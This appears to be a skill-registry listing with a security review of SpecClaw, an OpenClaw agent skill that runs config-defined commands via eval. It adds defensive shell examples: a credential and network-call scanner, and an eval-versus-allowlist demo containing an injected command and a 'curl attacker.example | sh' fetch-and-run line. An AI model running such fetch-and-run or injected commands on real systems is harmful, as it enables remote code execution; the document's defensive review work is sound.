SpecClaw

Author chanbistec · GitHub · v0.6.1 · MIT-0
cross-platform · ⚠ suspicious
122 total downloads · 0 favorites · 0 current installs · 7 versions
Install in OpenClaw
/install specclaw
Description
Spec-driven development framework for OpenClaw. Propose features, generate specs, spawn coding agents, validate implementations.
Safe-use recommendations
This skill is powerful and generally coherent with its purpose, but proceed with caution:
- Review config.yaml before using it: the skill runs the test/lint/build commands defined there and may auto-commit and auto-merge. Make sure those commands are safe and that the auto-merge behavior is acceptable to you.
- External integrations (GitHub issue sync, Discord notifications) are mentioned, but no credentials are declared. Inspect gh-sync.sh and the notification-related scripts to see which environment variables or auth methods they use, and supply credentials only if you trust the code and the repository.
- The skill spawns coding agents that receive file contents (up to 500 lines per file). If your repository contains secrets, clean or isolate it (or disable automation) before running builds.
- There is a small path inconsistency in the docs: SKILL.md sometimes references bash skill/scripts/*, while the actual scripts live in scripts/. Confirm the paths used at runtime (OpenClaw may mount skill files under a different root) so the commands the agent invokes resolve as intended.
- Test in a disposable or sandboxed repository first, and keep automation/cron disabled until you have validated the behavior.
- Before enabling the GitHub or Discord features, audit the specific scripts (gh-sync.sh and the notification code): find each place an external token is needed, look for code that posts to external endpoints or reads environment variables such as GITHUB_TOKEN or DISCORD_WEBHOOK, and identify which config.yaml options control auto-merge and automation.
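As a concrete form of the audit the last point asks for, here is an added example (not part of SpecClaw and not its scripts) of a small static scan over a skill's bundled scripts: it flags credential-looking environment variables, outbound network calls and string-built command execution. The sample bundle it writes to a temporary directory is constructed for the example; the file names gh-sync.sh, notify.sh, build.sh and status.sh and their contents are stand-ins, not the real skill's code. The variable names GITHUB_TOKEN and DISCORD_WEBHOOK are the ones the advice above mentions.

```shell
#!/bin/sh
# Added example, not part of SpecClaw: a quick static audit of a skill's bundled
# scripts for undeclared credential reads, network egress and eval-style execution.
set -u

# Build a constructed sample bundle in a temp dir. File names and contents are
# stand-ins for what a real skill might ship; point the audit at the real
# install directory instead when reviewing an actual skill.
make_sample_bundle() {
  dir=$(mktemp -d)
  mkdir -p "$dir/scripts"
  cat > "$dir/scripts/gh-sync.sh" <<'EOF'
#!/bin/sh
token="${GITHUB_TOKEN:-}"
curl -s -H "Authorization: Bearer $token" https://api.github.com/repos/o/r/issues
EOF
  cat > "$dir/scripts/notify.sh" <<'EOF'
#!/bin/sh
curl -s -X POST -d "$1" "$DISCORD_WEBHOOK"
EOF
  cat > "$dir/scripts/build.sh" <<'EOF'
#!/bin/sh
eval "$BUILD_CMD"
EOF
  cat > "$dir/scripts/status.sh" <<'EOF'
#!/bin/sh
git status --short
EOF
  printf '%s\n' "$dir"
}

# Print one finding per matching line, prefixed with its category:
#   credential: <file>:<line>:<env var>   environment variables that look like secrets
#   network:    <file>:<line>:<text>      curl/wget/ssh invocations or literal URLs
#   exec:       <file>:<line>:<text>      eval, sh -c, bash -c (string re-parsed as shell)
audit_skill_scripts() {
  dir=$1
  grep -rnoE '\$\{?[A-Z_]*(TOKEN|SECRET|PASSWORD|WEBHOOK|API_KEY)[A-Z_]*' "$dir/scripts" \
    | sed 's/^/credential: /'
  grep -rnE '(^|[^A-Za-z_-])(curl|wget|ssh)([^A-Za-z_-]|$)|https?://' "$dir/scripts" \
    | sed 's/^/network: /'
  grep -rnE '(^|[^A-Za-z_])eval([^A-Za-z_]|$)|(sh|bash) -c( |$)' "$dir/scripts" \
    | sed 's/^/exec: /'
}

# Number of findings in one category, for a quick go/no-go summary.
count_findings() {
  audit_skill_scripts "$1" | grep -c "^$2"
}

bundle=$(make_sample_bundle)
audit_skill_scripts "$bundle"
rm -rf "$bundle"
```

A finding is a place to read, not proof of malice: api.github.com is exactly what an issue-sync script should talk to. What matters is whether each token the scan surfaces is declared in the skill metadata, and whether the argument handed to eval can be influenced by anything other than the operator.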
Functional analysis
Type: OpenClaw Skill. Name: specclaw. Version: 0.6.1. The specclaw skill bundle implements a complex spec-driven development framework that orchestrates sub-agents to automate code changes. It is classified as suspicious because scripts/build.sh and scripts/verify.sh use eval to execute the shell commands (test, lint and build) defined in config.yaml. Anyone who can change config.yaml can therefore run arbitrary shell commands under the agent's privileges, the classic command-injection risk of eval on string-built commands. Additionally, scripts/gh-sync.sh handles GitHub authentication tokens to interact with the GitHub API (api.github.com). These capabilities are aligned with the stated purpose of a build and synchronization engine, but the lack of sanitization of the executed commands is high-risk behavior, even though there is no evidence of intentional malice.
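The eval pattern described above, as an added illustration that is not SpecClaw's own build.sh or verify.sh: a config-supplied command string run through eval, beside a runner that splits the value into plain arguments and checks the program against an allowlist before executing it. The command strings, the allowlist and the function names are constructed for this example.

```shell
#!/bin/sh
# Added illustration, not SpecClaw's scripts: running a config-supplied command
# string through eval versus running it as plain arguments behind an allowlist.
set -u

# Constructed stand-ins for a test command read from config.yaml (no YAML
# parsing is needed for the demonstration; only the string matters).
CONFIG_TEST_CMD='echo unit-tests-ok'
# The same key after a hostile edit to config.yaml.
TAMPERED_TEST_CMD='echo unit-tests-ok; echo PWNED-second-command-ran'

# Vulnerable pattern: eval re-parses the whole string as shell, so ';', '|',
# '$(...)', backticks and redirections inside the config value all execute.
run_with_eval() {
  eval "$1"
}

# Safer pattern: split the value on whitespace only (globbing off, and word
# splitting never performs command substitution), require the program to be on
# an allowlist, then execute the words as argv. Shell metacharacters stay inert
# text. The allowlist is an assumption for this example; a real one would be
# set by the operator, not by the repository being built.
ALLOWED_PROGRAMS="echo npm pnpm yarn make pytest cargo go"

run_allowlisted() {
  set -f
  # Field splitting is the intent here, so the unquoted expansion is deliberate.
  set -- $1
  set +f
  prog=${1:-}
  case " $ALLOWED_PROGRAMS " in
    *" $prog "*) ;;
    *) echo "refusing to run '$prog': not in allowlist" >&2; return 2 ;;
  esac
  "$@"
}

# Benign config behaves the same either way.
run_with_eval "$CONFIG_TEST_CMD"
run_allowlisted "$CONFIG_TEST_CMD"
# Tampered config: eval runs the injected second command ...
run_with_eval "$TAMPERED_TEST_CMD"
# ... while the allowlisted runner hands "unit-tests-ok;" to echo as text.
run_allowlisted "$TAMPERED_TEST_CMD"
# A program that is not allowlisted is refused before anything runs.
run_allowlisted 'curl http://attacker.example/x | sh' || echo "blocked, as expected"
```

The allowlisted runner loses the ability to express pipelines and environment assignments in the config value, which is the point: anything that needs shell syntax should be a committed script that reviewers can read, invoked by name, rather than a string the agent re-parses at build time.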
Capability assessment
Purpose & Capability
The scripts and runtime instructions match the stated purpose: orchestrating propose→plan→build→verify workflows, spawning coding agents, creating worktrees/branches, and committing changes. This level of file and version-control operations is expected for a spec-driven build orchestrator. Note: the SKILL.md mentions optional GitHub sync and notification integrations (Discord), but the registry metadata declares no required credentials or config paths for those services, a gap between claimed capabilities and declared requirements.
Instruction Scope
Runtime instructions read repository files, generate context payloads (build-context.sh collects listed files up to 500 lines each), create/modify files in .specclaw and the project, spawn coding subagents, run git operations (branch/worktree creation, commits, merges), and run configured test/lint/build commands. All of this is consistent with the skill goal, but it implies the agent will be given broad read/write access to the repo and may run arbitrary build/test commands. The SKILL.md also describes an autonomous 'cron' automation mode that will run builds on a schedule — this is powerful and should be enabled only with care.
Install Mechanism
There is no install spec (instruction-only). Scripts are bundled in the skill and invoked by the agent (via exec). No external downloads/installs are requested by the skill itself, which reduces install-time risk. The presence of many bundled scripts is expected for an orchestrator.
Credentials
The skill declares no required environment variables or primary credential, yet the SKILL.md and templates reference optional GitHub sync (creating/updating Issues) and external notifications (e.g., Discord channels). Those integrations normally require tokens or credentials (GH PAT, Discord webhook/bot token) but none are declared in requires.env. That mismatch could mean the skill expects credentials to exist elsewhere (git remotes/SSH, local environment), or that gh-sync.sh / notification scripts will read undeclared env vars at runtime — both are notable. Also, the skill emits commands that will run your project's test/lint/build commands (configurable in config.yaml) which may require network access or credentials not surfaced by the skill metadata.
Persistence & Privilege
The skill does not request 'always: true' and is user-invocable. However it can spawn agents autonomously (default platform behavior) and SKILL.md documents an automation/cron mode that will run builds on its own schedule. Combined with the skill's ability to create branches/worktrees and commit/merge changes, this grants meaningful persistent capabilities over the repository when enabled. There is no sign it tries to modify other skills' configs.
How to use
  1. Make sure OpenClaw is installed (locally or as a Docker deployment).
  2. Enter the install command in the chat box: /install specclaw
  3. After installation, call the skill by name or trigger it with /specclaw.
  4. Provide the required inputs described in the skill's parameter documentation to get structured output.
Version history
v0.6.1
Fix: gh-sync auth fallback (invalid token falls back to gh CLI). Fix: validate-change.sh enforces GitHub issue creation when github.sync is enabled.
v0.6.0
Phase validation guards: enforce propose→plan→build→verify→archive prerequisites. Configurable strict mode (workflow.strict). Change status inspector.
v0.5.0
Git worktrees: worktree-per-change strategy for parallel multi-change builds. Verification engine: evidence collection, agent-powered spec validation, structured reports.
v0.4.0
Verification engine: evidence collection, verify agent spawning, structured pass/fail reports, auto-verify after build, remediation suggestions. Also: gh-sync task checklist fix.
v0.3.0
GitHub Issues sync: one issue per change with task checklist, dual gh CLI + curl support, auto-sync across propose/plan/build/verify/archive
v0.2.0
Self-improvement features: build error journal with retry context, specclaw learn command, post-build review with scope deviation detection, cross-change pattern detection with auto-promotion
v0.1.0
Initial release: spec-driven development framework with build engine, wave-based parallel agent orchestration, git integration, task parsing, and status tracking
Metadata
Slug: specclaw
Version: 0.6.1
License: MIT-0
Cumulative installs: 0
Current installs: 0
Number of versions: 7
FAQ

What is SpecClaw?

Spec-driven development framework for OpenClaw. Propose features, generate specs, spawn coding agents, validate implementations. It is an AI agent skill plugin for Claude Code / OpenClaw, with 122 downloads to date.

How do I install SpecClaw?

Run the command /install specclaw in the OpenClaw or Claude Code chat box. Installation itself needs no extra setup, but review config.yaml and the bundled scripts (see the safe-use recommendations above) before enabling automation or the GitHub/Discord integrations.

Is SpecClaw free?

Yes. SpecClaw is free under the MIT-0 license and can be downloaded, installed and used without restriction.

Which platforms does SpecClaw support?

SpecClaw is cross-platform and runs in any environment where OpenClaw / Claude Code is deployed.

Who develops SpecClaw?

Developed and maintained by chanbistec (@chanbistec); the current version is v0.6.1.